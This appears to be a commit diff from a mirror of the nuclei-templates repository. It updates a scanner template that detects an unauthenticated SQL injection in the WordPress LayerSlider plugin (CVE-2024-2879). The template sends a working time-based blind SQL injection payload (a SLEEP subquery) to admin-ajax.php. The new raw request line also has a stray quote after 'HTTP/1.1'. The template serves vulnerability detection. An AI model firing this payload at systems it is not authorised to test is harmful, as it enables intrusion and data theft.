daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2024-2879.yaml

patch-1
Ritik Chaddha 2024-04-09 15:10:11 +05:30 committed by GitHub
parent 013dfff19e
commit d4f7430e62
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
http/cves/2024/CVE-2024-2879.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2024-2879
info:
name: WordPress Plugin LayerSlider 7.9.11-7.10.0 Unauthenticated SQL Injection
name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection
author: d4ly
severity: critical
description: |
@ -22,7 +22,7 @@ info:
epss-percentile: 0.07687
metadata:
verified: true
max-request: 1
max-request: 2
publicwww-query: "/wp-content/plugins/LayerSlider/"
tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli
@ -32,18 +32,23 @@ http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"
matchers:
- type: word
internal: true
words:
- ".ls-clearfix:before"
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)"
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1'
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration>=5
- duration>=6
- status_code == 200
- contains(body, "<script>")
condition: and